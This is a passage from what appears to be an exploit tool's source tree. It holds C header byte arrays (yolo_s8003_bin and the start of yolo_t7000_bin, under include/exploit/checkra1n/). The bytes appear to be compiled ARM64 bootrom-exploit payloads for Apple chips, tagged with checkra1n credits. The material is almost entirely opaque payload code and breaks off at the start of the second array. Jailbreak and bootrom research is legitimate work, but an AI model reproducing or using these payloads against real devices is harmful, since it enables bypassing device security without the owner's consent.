0xb9, 27 | 0xe1, 0x03, 0x84, 0x52, 0x61, 0xa0, 0xba, 0x72, 0xe1, 0x38, 0x00, 0xb9, 28 | 0xe1, 0x48, 0x00, 0xb9, 0x01, 0x80, 0x40, 0x91, 0xe3, 0xff, 0xff, 0x97, 29 | 0x00, 0x20, 0x3e, 0xd5, 0x41, 0x20, 0x3e, 0xd5, 0x21, 0x14, 0x00, 0x12, 30 | 0x3f, 0x70, 0x00, 0x71, 0x62, 0x00, 0x00, 0x54, 0x00, 0x00, 0x40, 0xf9, 31 | 0x00, 0x8c, 0x74, 0x92, 0xa1, 0xd0, 0x80, 0xd2, 0x21, 0x04, 0x61, 0xb2, 32 | 0x01, 0x00, 0x02, 0xf9, 0x9f, 0x3f, 0x03, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 33 | 0xdf, 0x3f, 0x03, 0xd5, 0xe7, 0x07, 0x61, 0xb2, 0xe7, 0x80, 0x43, 0x91, 34 | 0xe0, 0x00, 0x10, 0x91, 0x61, 0x01, 0x00, 0x10, 0x82, 0x2e, 0x81, 0xd2, 35 | 0xe0, 0x00, 0x00, 0x94, 0xe0, 0x00, 0x10, 0x91, 0x01, 0xd0, 0x25, 0x91, 36 | 0xcd, 0xff, 0xff, 0x97, 0x28, 0x00, 0xc0, 0xd2, 0x88, 0xbd, 0x80, 0xf2, 37 | 0x00, 0x00, 0x80, 0x52, 0x13, 0x00, 0x80, 0x52, 0x00, 0x01, 0x1f, 0xd6, 38 | 0xf9, 0x03, 0x00, 0xaa, 0xf8, 0x03, 0x01, 0xaa, 0xf7, 0x03, 0x1e, 0xaa, 39 | 0xf6, 0x03, 0x1d, 0xaa, 0x87, 0x01, 0x00, 0x94, 0x20, 0x03, 0x42, 0xb9, 40 | 0x81, 0x89, 0x89, 0x52, 0x41, 0x08, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 41 | 0xa0, 0x01, 0x00, 0x54, 0x21, 0xcd, 0x89, 0x52, 0xe1, 0xed, 0xad, 0x72, 42 | 0x21, 0x03, 0x02, 0xb9, 0x20, 0x0b, 0x42, 0xb9, 0xe1, 0xac, 0x8c, 0x52, 43 | 0x21, 0x06, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 44 | 0xe0, 0x03, 0x19, 0xaa, 0xc3, 0x01, 0x00, 0x94, 0xdf, 0x01, 0x00, 0x94, 45 | 0x01, 0x02, 0x00, 0x94, 0x20, 0x13, 0x00, 0x91, 0x01, 0xc0, 0xa6, 0x52, 46 | 0x01, 0x01, 0x80, 0x72, 0xe2, 0x4b, 0x0e, 0x32, 0xe3, 0x2b, 0x18, 0x32, 47 | 0x05, 0x3c, 0xc0, 0x92, 0x05, 0xf0, 0xbf, 0xf2, 0x05, 0x02, 0x80, 0xf2, 48 | 0x06, 0x50, 0xbe, 0xd2, 0xc7, 0x40, 0x00, 0x91, 0x06, 0x28, 0xf7, 0xf2, 49 | 0x06, 0x01, 0xc0, 0xf2, 0xe7, 0x0b, 0xf7, 0xf2, 0x07, 0x41, 0xd8, 0xf2, 50 | 0x00, 0x10, 0x00, 0x91, 0x9f, 0x01, 0x00, 0x94, 0xa0, 0x12, 0x00, 0xb4, 51 | 0x04, 0x80, 0x5f, 0xf8, 0x84, 0x00, 0x05, 0x8a, 0x9f, 0x00, 0x06, 0xeb, 52 | 0x84, 0x10, 0x47, 0xfa, 0x21, 0xff, 0xff, 0x54, 0x04, 0x21, 0x80, 0x52, 53 | 0x04, 0x40, 0xa6, 0x72, 0x04, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0xd1, 54 | 0x01, 0x00, 0x80, 0x52, 0x01, 0x80, 0xb2, 0x72, 0x02, 0x00, 0x80, 0x52, 55 | 0x02, 0x80, 0xbf, 0x72, 0x03, 0x80, 0x00, 0xd1, 0x04, 0xcc, 0x5f, 0xf8, 56 | 0x84, 0x00, 0x02, 0x8a, 0x9f, 0x00, 0x01, 0xeb, 0x80, 0x00, 0x00, 0x54, 57 | 0x1f, 0x00, 0x03, 0xeb, 0x68, 0xff, 0xff, 0x54, 0x80, 0x00, 0x00, 0x14, 58 | 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 0x02, 0x08, 0x00, 0x29, 59 | 0xe0, 0x03, 0x19, 0xaa, 0xf4, 0x01, 0x00, 0x94, 0xe1, 0x2b, 0x18, 0x32, 60 | 0x01, 0x00, 0x01, 0x8b, 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 61 | 0x43, 0x80, 0x22, 0x11, 0x04, 0x80, 0xa2, 0x52, 0x87, 0x39, 0x80, 0xd2, 62 | 0x08, 0x00, 0x80, 0xd2, 0x1f, 0x00, 0x01, 0xeb, 0x22, 0x0e, 0x00, 0x54, 63 | 0x05, 0x00, 0x40, 0xb9, 0xbf, 0x00, 0x00, 0x71, 0xa4, 0x10, 0x42, 0x7a, 64 | 0xa4, 0x10, 0x43, 0x7a, 0xa4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 65 | 0x00, 0x10, 0x00, 0x91, 0xf7, 0xff, 0xff, 0x17, 0xe5, 0x03, 0x00, 0xaa, 66 | 0xa6, 0x4c, 0x40, 0xb8, 0xdf, 0x00, 0x00, 0x71, 0xc4, 0x10, 0x42, 0x7a, 67 | 0xc4, 0x10, 0x43, 0x7a, 0xc4, 0x10, 0x44, 0x7a, 0x60, 0x00, 0x00, 0x54, 68 | 0xe0, 0x03, 0x05, 0xaa, 0xee, 0xff, 0xff, 0x17, 0xa6, 0x00, 0x00, 0xcb, 69 | 0xdf, 0x00, 0x07, 0x6b, 0x42, 0x00, 0x00, 0x54, 0xf5, 0xff, 0xff, 0x17, 70 | 0xe9, 0x03, 0x00, 0xaa, 0xa8, 0x00, 0x00, 0xb5, 0xe8, 0x03, 0x09, 0xaa, 71 | 0xe0, 0x03, 0x05, 0xaa, 0x87, 0x3b, 0x80, 0xd2, 0xe4, 0xff, 0xff, 0x17, 72 | 0xe0, 0x03, 0x08, 0xaa, 0x61, 0x0e, 0x00, 0x10, 0x82, 0x39, 0x80, 0xd2, 73 | 0x6e, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x09, 0xaa, 0x41, 0x1c, 0x00, 0x10, 74 | 0x82, 0x3b, 0x80, 0xd2, 0x6a, 0x00, 0x00, 0x94, 0x27, 0xc3, 0x09, 0x91, 75 | 0xe8, 0x24, 0x00, 0xa9, 0x20, 0x83, 0x0a, 0x91, 0xe8, 0x03, 0x00, 0xaa, 76 | 0x01, 0x0a, 0x00, 0x10, 0x02, 0x0c, 0x80, 0xd2, 0x63, 0x00, 0x00, 0x94, 77 | 0xe0, 0x03, 0x19, 0xaa, 0x01, 0x50, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 78 | 0x02, 0x00, 0x80, 0x12, 0xe3, 0x2b, 0x18, 0x32, 0x4a, 0x01, 0x00, 0x94, 79 | 0x00, 0x08, 0x00, 0xb4, 0xc1, 0xa3, 0xba, 0x52, 0x01, 0x00, 0x82, 0x72, 80 | 0xe2, 0x03, 0x80, 0x12, 0x03, 0x40, 0x80, 0x52, 0x4d, 0x01, 0x00, 0x94, 81 | 0x40, 0x07, 0x00, 0xb4, 0x41, 0x16, 0x00, 0x18, 0x02, 0x00, 0x80, 0x12, 82 | 0x03, 0x04, 0x80, 0x52, 0x3f, 0x01, 0x00, 0x94, 0xa0, 0x06, 0x00, 0xb4, 83 | 0x24, 0x53, 0x09, 0x91, 0x05, 0x98, 0xc0, 0x29, 0x85, 0x18, 0x81, 0x28, 84 | 0x05, 0x18, 0x41, 0x29, 0xc7, 0x7c, 0x18, 0x53, 0xff, 0x60, 0x01, 0x71, 85 | 0x60, 0x00, 0x00, 0x54, 0x85, 0x18, 0x81, 0x28, 0x13, 0x00, 0x00, 0x14, 86 | 0x85, 0x44, 0x00, 0xb8, 0xc7, 0x5c, 0x05, 0x13, 0x07, 0xc8, 0x27, 0x8b, 87 | 0xe7, 0xc0, 0x40, 0xf8, 0xff, 0x3c, 0x50, 0xf2, 0xc1, 0x04, 0x00, 0x54, 88 | 0xc6, 0x10, 0x00, 0x12, 0x06, 0x58, 0xba, 0x72, 0xe5, 0xbc, 0x60, 0xd3, 89 | 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 0x06, 0x54, 0xbe, 0x72, 90 | 0xe5, 0x7c, 0x50, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 91 | 0x06, 0x50, 0xbe, 0x72, 0xe6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 92 | 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x81, 0x00, 0x00, 0xb9, 93 | 0x01, 0x58, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 0x05, 0xbd, 0x60, 0xd3, 94 | 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x00, 0x00, 0xb9, 0x01, 0x54, 0xbe, 0x72, 95 | 0x05, 0x7d, 0x50, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x04, 0x00, 0xb9, 96 | 0x01, 0x50, 0xbe, 0x72, 0x01, 0x3d, 0x1b, 0x33, 0x01, 0x08, 0x00, 0xb9, 97 | 0xe1, 0xc7, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 0x01, 0x0c, 0x00, 0xb9, 98 | 0xe0, 0x03, 0x19, 0xaa, 0xe1, 0x03, 0x18, 0xaa, 0xfe, 0x03, 0x17, 0xaa, 99 | 0xfd, 0x03, 0x16, 0xaa, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x4f, 0x03, 0xd5, 100 | 0xc0, 0x03, 0x5f, 0xd6, 0x48, 0x00, 0xc0, 0xd2, 0x68, 0x05, 0xa2, 0xf2, 101 | 0x08, 0x00, 0x98, 0xf2, 0x00, 0x01, 0x40, 0xb9, 0x00, 0x78, 0x1f, 0x12, 102 | 0x00, 0x01, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x14, 0xf2, 0x03, 0x1e, 0xaa, 103 | 0xc0, 0xcf, 0x74, 0x92, 0x00, 0x00, 0x2f, 0x91, 0x81, 0x02, 0x00, 0x18, 104 | 0xc2, 0x4f, 0x40, 0xb8, 0x5f, 0x00, 0x01, 0x6b, 0xc1, 0xff, 0xff, 0x54, 105 | 0x04, 0x00, 0x1e, 0xcb, 0x02, 0x80, 0xa2, 0x52, 0x82, 0x6c, 0x02, 0x33, 106 | 0xc2, 0x03, 0x00, 0xb9, 0x21, 0xfd, 0xff, 0x58, 0x82, 0x39, 0x80, 0xd2, 107 | 0x08, 0x00, 0x00, 0x94, 0x01, 0xfd, 0xff, 0x58, 0x82, 0x3b, 0x80, 0xd2, 108 | 0x05, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 0xdb, 0xff, 0xff, 0x17, 109 | 0x24, 0x44, 0x40, 0xb8, 0x04, 0x44, 0x00, 0xb8, 0x42, 0x10, 0x00, 0x71, 110 | 0xa2, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0xdf, 0x4f, 0x03, 0xd5, 111 | 0xfc, 0x03, 0x1e, 0xaa, 0xfb, 0x03, 0x00, 0xaa, 0x48, 0x00, 0xc0, 0xd2, 112 | 0x68, 0x05, 0xa2, 0xf2, 0x08, 0x00, 0x80, 0xf2, 0x1f, 0x0d, 0x00, 0xb9, 113 | 0x1f, 0x1d, 0x00, 0xb9, 0x08, 0x19, 0x00, 0x58, 0x08, 0xc0, 0x1e, 0xd5, 114 | 0x20, 0x02, 0x00, 0x10, 0x21, 0x00, 0xc0, 0xd2, 0xe1, 0x01, 0xb0, 0xf2, 115 | 0x01, 0x00, 0x98, 0xf2, 0x22, 0x10, 0x40, 0x91, 0x1f, 0x00, 0x01, 0xeb, 116 | 0x02, 0x20, 0x42, 0xfa, 0x43, 0x01, 0x00, 0x54, 0x21, 0xb0, 0x01, 0x91, 117 | 0x22, 0xf0, 0x0c, 0x91, 0xe3, 0x03, 0x01, 0xaa, 0x04, 0x44, 0x40, 0xb8, 118 | 0x24, 0x44, 0x00, 0xb8, 0x3f, 0x00, 0x02, 0xeb, 0xa3, 0xff, 0xff, 0x54, 119 | 0x7a, 0x00, 0x00, 0x94, 0x60, 0x00, 0x1f, 0xd6, 0x20, 0x15, 0x00, 0x58, 120 | 0x41, 0x15, 0x00, 0x58, 0x02, 0x08, 0x81, 0x52, 0x7a, 0x00, 0x00, 0x94, 121 | 0x02, 0x66, 0x8f, 0x52, 0x7d, 0x00, 0x00, 0x94, 0xe0, 0x14, 0x00, 0x58, 122 | 0xbf, 0x41, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 123 | 0xbf, 0x40, 0x00, 0xd5, 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 124 | 0x48, 0x14, 0x00, 0x58, 0x00, 0x01, 0x00, 0xf9, 0xff, 0x44, 0x03, 0xd5, 125 | 0x1f, 0x75, 0x08, 0xd5, 0x09, 0x14, 0x00, 0x58, 0x07, 0x0c, 0xe0, 0xd2, 126 | 0x27, 0x84, 0x80, 0xf2, 0xe1, 0x03, 0x09, 0xaa, 0x02, 0x00, 0x90, 0x52, 127 | 0x6c, 0x00, 0x00, 0x94, 0xe8, 0x03, 0x09, 0xaa, 0x20, 0x00, 0xc0, 0xd2, 128 | 0x41, 0x00, 0xa0, 0x52, 0xa0, 0xd0, 0x80, 0xf2, 0x6f, 0x00, 0x00, 0x94, 129 | 0x40, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 0x00, 0x00, 0x07, 0xaa, 130 | 0x6b, 0x00, 0x00, 0x94, 0xc0, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa4, 0x52, 131 | 0x00, 0x00, 0x07, 0xaa, 0x67, 0x00, 0x00, 0x94, 0xe0, 0x00, 0xc0, 0xd2, 132 | 0x00, 0x00, 0xb8, 0xf2, 0x01, 0x40, 0xa0, 0x52, 0x00, 0x00, 0x07, 0xaa, 133 | 0x62, 0x00, 0x00, 0x94, 0x28, 0x11, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 134 | 0x20, 0x01, 0x03, 0xf9, 0xe0, 0x07, 0x61, 0xb2, 0x01, 0x08, 0xa0, 0x52, 135 | 0xe0, 0xc0, 0x80, 0xf2, 0x57, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 136 | 0x80, 0xe0, 0x9f, 0x52, 0x00, 0xa2, 0x1e, 0xd5, 0x09, 0x20, 0x1e, 0xd5, 137 | 0x20, 0x00, 0xa0, 0x52, 0x80, 0xa3, 0x94, 0x72, 0x40, 0x20, 0x1e, 0xd5, 138 | 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x01, 0x80, 0x52, 139 | 0x00, 0x11, 0x1e, 0xd5, 0xa8, 0x01, 0x82, 0x52, 0x00, 0x10, 0x3e, 0xd5, 140 | 0x00, 0x00, 0x08, 0xaa, 0x00, 0x10, 0x1e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 141 | 0x28, 0x0f, 0x00, 0x58, 0xc0, 0x0e, 0x00, 0x58, 0x01, 0x02, 0xa0, 0x52, 142 | 0x01, 0x00, 0x80, 0x72, 0x22, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 143 | 0xb3, 0x0e, 0x00, 0x10, 0xd4, 0x0f, 0x00, 0x10, 0x68, 0x86, 0x40, 0xf8, 144 | 0x00, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 0x7f, 0x02, 0x14, 0xeb, 145 | 0x83, 0xff, 0xff, 0x54, 0x48, 0x0f, 0x00, 0x58, 0x20, 0x00, 0x80, 0x52, 146 | 0x00, 0x01, 0x3f, 0xd6, 0xc0, 0x09, 0x00, 0x10, 0x01, 0x0f, 0x00, 0x58, 147 | 0xe2, 0x01, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 0x23, 0x14, 0x00, 0x38, 148 | 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 0x40, 0x09, 0x00, 0x70, 149 | 0x61, 0x0e, 0x00, 0x58, 0xa2, 0x03, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 150 | 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 151 | 0x40, 0x00, 0x80, 0x52, 0xc1, 0x0d, 0x00, 0x58, 0x20, 0x00, 0x00, 0xb9, 152 | 0x88, 0x0c, 0x00, 0x58, 0x20, 0x0a, 0x00, 0x58, 0x01, 0x01, 0xa0, 0xd2, 153 | 0x00, 0x01, 0x3f, 0xd6, 0x31, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 154 | 0x80, 0x09, 0x00, 0x58, 0x01, 0x00, 0x42, 0x91, 0x20, 0x7b, 0x0b, 0xd5, 155 | 0x00, 0x00, 0x01, 0x91, 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 156 | 0x0b, 0x00, 0x00, 0x94, 0xdf, 0x4f, 0x03, 0xd5, 0xbf, 0x41, 0x00, 0xd5, 157 | 0xff, 0x03, 0x40, 0x92, 0x1f, 0x41, 0x18, 0xd5, 0x1f, 0xc0, 0x1e, 0xd5, 158 | 0xdf, 0x3f, 0x03, 0xd5, 0xfe, 0x03, 0x1c, 0xaa, 0xe0, 0x03, 0x1b, 0xaa, 159 | 0xa8, 0x07, 0x00, 0x58, 0x00, 0x01, 0x1f, 0xd6, 0x9f, 0x3f, 0x03, 0xd5, 160 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 161 | 0xc0, 0x03, 0x5f, 0xd6, 0x03, 0x10, 0xc1, 0xa8, 0x23, 0x10, 0x81, 0xa8, 162 | 0x42, 0x40, 0x00, 0x71, 0xa8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 163 | 0x3f, 0x7c, 0x81, 0xa8, 0x42, 0x40, 0x00, 0x71, 0xc8, 0xff, 0xff, 0x54, 164 | 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0xfc, 0x4b, 0xd3, 0x21, 0xfc, 0x4e, 0xd3, 165 | 0x03, 0x00, 0x88, 0x52, 0x04, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x56, 0xd3, 166 | 0x21, 0xfc, 0x59, 0xd3, 0x03, 0x40, 0xa0, 0x52, 0x84, 0x28, 0x7d, 0x92, 167 | 0x84, 0x00, 0x08, 0x8b, 0x02, 0x00, 0x80, 0x52, 0x80, 0x58, 0x22, 0xf8, 168 | 0x00, 0x00, 0x03, 0x8b, 0x42, 0x04, 0x00, 0x11, 0x5f, 0x00, 0x01, 0x6b, 169 | 0x83, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x41, 0x00, 0xc0, 0xd2, 170 | 0x01, 0xe2, 0xa1, 0xf2, 0x01, 0x44, 0x80, 0xf2, 0x20, 0x00, 0x40, 0xb9, 171 | 0x00, 0x74, 0x1e, 0x12, 0x20, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 172 | 0x1f, 0x20, 0x03, 0xd5, 0x59, 0x4f, 0x4c, 0x4f, 0x3a, 0x63, 0x68, 0x65, 173 | 0x63, 0x6b, 0x72, 0x61, 0x31, 0x6e, 0x00, 0x47, 0x41, 0x4e, 0x47, 0x3a, 174 | 0x4b, 0x4a, 0x43, 0x20, 0x48, 0x41, 0x58, 0x58, 0x3a, 0x41, 0x78, 0x69, 175 | 0x30, 0x6d, 0x58, 0x20, 0x45, 0x54, 0x41, 0x3a, 0x73, 0x6f, 0x6e, 0x00, 176 | 0x00, 0x90, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x80, 177 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 178 | 0x00, 0x02, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x80, 0x0c, 0x80, 179 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 180 | 0x00, 0xd0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x80, 181 | 0x01, 0x00, 0x00, 0x00, 0x44, 0x70, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 182 | 0xa8, 0xbf, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x54, 0xb6, 0x00, 0x00, 183 | 0x01, 0x00, 0x00, 0x00, 0xf0, 0x1c, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 184 | 0x74, 0x11, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50, 0xc6, 0x00, 0x00, 185 | 0x01, 0x00, 0x00, 0x00, 0x84, 0xf0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 186 | 0x68, 0x02, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0xa0, 0x79, 0x08, 0x80, 187 | 0x01, 0x00, 0x00, 0x00, 0xd7, 0x79, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 188 | 0x54, 0x79, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0xb9, 189 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 190 | 0x00, 0x10, 0x00, 0x91, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 191 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0x00, 0x40, 0xb9, 192 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 193 | 0x00, 0x10, 0x00, 0xd1, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 194 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 195 | 0xa5, 0x4e, 0xb2, 0x52, 0x05, 0x00, 0x9a, 0x72, 0x06, 0x48, 0xb6, 0x52, 196 | 0xe7, 0x43, 0xb5, 0x52, 0x28, 0x40, 0xa5, 0x52, 0x08, 0x7c, 0x80, 0x72, 197 | 0x43, 0x44, 0x40, 0xb8, 0x64, 0x68, 0x1b, 0x12, 0x9f, 0x00, 0x05, 0x6b, 198 | 0xa1, 0xff, 0xff, 0x54, 0x66, 0x10, 0x1b, 0x33, 0x44, 0x00, 0x40, 0xb9, 199 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x06, 0x6b, 0x60, 0x01, 0x00, 0x54, 200 | 0x7f, 0x00, 0x08, 0x6b, 0xc1, 0xfe, 0xff, 0x54, 0xc9, 0x10, 0x1b, 0x12, 201 | 0x09, 0x40, 0xb5, 0x72, 0x89, 0x10, 0x10, 0x33, 0x44, 0x04, 0x40, 0xb9, 202 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x09, 0x6b, 0xe1, 0xfd, 0xff, 0x54, 203 | 0x42, 0x10, 0x00, 0x91, 0x87, 0x24, 0x00, 0x33, 0x47, 0x00, 0x00, 0xb9, 204 | 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 0xc7, 0x41, 0xa6, 0x52, 205 | 0x07, 0x7c, 0x80, 0x72, 0x08, 0x54, 0xaa, 0x52, 0x08, 0x10, 0x80, 0x72, 206 | 0x09, 0x40, 0xb5, 0x52, 0x09, 0x7e, 0x80, 0x72, 0xea, 0x40, 0x40, 0x51, 207 | 0x0b, 0x01, 0x02, 0x11, 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x07, 0x6b, 208 | 0x64, 0x10, 0x48, 0x7a, 0xa1, 0xff, 0xff, 0x54, 0x43, 0x90, 0x40, 0x29, 209 | 0x63, 0x6c, 0x1c, 0x12, 0x9f, 0x00, 0x0a, 0x6b, 0x84, 0x10, 0x4b, 0x7a, 210 | 0x60, 0x00, 0x49, 0x7a, 0xe1, 0xfe, 0xff, 0x54, 0x43, 0x00, 0x40, 0xb9, 211 | 0x44, 0x0c, 0x40, 0xb9, 0x63, 0x00, 0x04, 0x4b, 0x84, 0x7c, 0x1a, 0x53, 212 | 0x9f, 0x94, 0x00, 0x71, 0x60, 0x08, 0x43, 0x7a, 0x01, 0xfe, 0xff, 0x54, 213 | 0x42, 0x30, 0x00, 0x91, 0x43, 0x4c, 0x40, 0xb8, 0x64, 0x7c, 0x1a, 0x53, 214 | 0x9f, 0x94, 0x00, 0x71, 0xa1, 0xff, 0xff, 0x54, 0x63, 0x64, 0x00, 0x13, 215 | 0x47, 0x00, 0x00, 0x18, 0x47, 0xd8, 0x23, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 216 | 0xe2, 0x03, 0x00, 0xaa, 0x08, 0x40, 0xa6, 0x52, 0x08, 0xfc, 0x80, 0x72, 217 | 0x09, 0x50, 0xaa, 0x52, 0x09, 0x0c, 0x80, 0x72, 0xaa, 0x04, 0x80, 0x52, 218 | 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x08, 0x6b, 0x64, 0x10, 0x49, 0x7a, 219 | 0xa1, 0xff, 0xff, 0x54, 0x43, 0x10, 0x40, 0x29, 0x45, 0x18, 0x41, 0x29, 220 | 0x47, 0x10, 0x40, 0xb9, 0x63, 0x7c, 0x1a, 0x53, 0xa5, 0x7c, 0x1a, 0x53, 221 | 0x9f, 0x00, 0x08, 0x6b, 0x84, 0x10, 0x49, 0x7a, 0xa1, 0xfe, 0xff, 0x54, 222 | 0xdf, 0x00, 0x08, 0x6b, 0xc4, 0x10, 0x49, 0x7a, 0xe4, 0x7c, 0x1a, 0x53, 223 | 0x60, 0x00, 0x4a, 0x7a, 0xa0, 0x00, 0x4a, 0x7a, 0x80, 0x00, 0x4a, 0x7a, 224 | 0xc1, 0xfd, 0xff, 0x54, 0x42, 0x40, 0x00, 0x91, 0xe7, 0x64, 0x00, 0x13, 225 | 0x43, 0x00, 0x00, 0x18, 0x43, 0xd8, 0x27, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 226 | 0xe2, 0x03, 0x00, 0xaa, 0x03, 0x28, 0xb7, 0x52, 0x23, 0x21, 0x80, 0x72, 227 | 0x24, 0x40, 0xa6, 0x52, 0x24, 0x25, 0x80, 0x72, 0x05, 0x20, 0xb7, 0x52, 228 | 0x25, 0x21, 0x80, 0x72, 0x66, 0xa0, 0xba, 0x52, 0xe6, 0xf3, 0x87, 0x72, 229 | 0xe7, 0xcb, 0xba, 0x52, 0x07, 0x78, 0x80, 0x72, 0x08, 0x50, 0xbe, 0x52, 230 | 0x08, 0x01, 0x80, 0x72, 0x09, 0x80, 0xa6, 0x52, 0x4a, 0xac, 0xc0, 0x29, 231 | 0x5f, 0x01, 0x03, 0x6b, 0x60, 0x01, 0x44, 0x7a, 0xa1, 0xff, 0xff, 0x54, 232 | 0x4a, 0x2c, 0x41, 0x29, 0x7f, 0x01, 0x06, 0x6b, 0x64, 0x11, 0x47, 0x7a, 233 | 0x40, 0x01, 0x45, 0x7a, 0x01, 0xff, 0xff, 0x54, 0x4a, 0xc0, 0x5f, 0xb8, 234 | 0x4a, 0x35, 0x09, 0x12, 0x5f, 0x01, 0x08, 0x6b, 0x81, 0xfe, 0xff, 0x54, 235 | 0x4a, 0x10, 0x00, 0xd1, 0x4b, 0x61, 0x00, 0xd1, 0x4c, 0xcd, 0x5f, 0xb8, 236 | 0x8d, 0x35, 0x09, 0x12, 0xbf, 0x01, 0x09, 0x6b, 0x80, 0x00, 0x00, 0x54, 237 | 0x5f, 0x01, 0x0b, 0xeb, 0x68, 0xff, 0xff, 0x54, 0xeb, 0xff, 0xff, 0x17, 238 | 0x8c, 0x5d, 0x05, 0x13, 0x08, 0x80, 0xa2, 0x52, 0x88, 0x65, 0x00, 0x33, 239 | 0x48, 0x01, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6 240 | }; 241 | unsigned int yolo_s8003_bin_len = 2852; 242 | -------------------------------------------------------------------------------- /include/exploit/checkra1n/yolo_t7000.h: -------------------------------------------------------------------------------- 1 | unsigned char yolo_t7000_bin[] = { 2 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 3 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x38, 0x80, 4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf4, 0xdd, 0x00, 0x00, 5 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x00, 0x00, 0x00, 0x00, 0xf4, 0xdd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 8 | 0x40, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 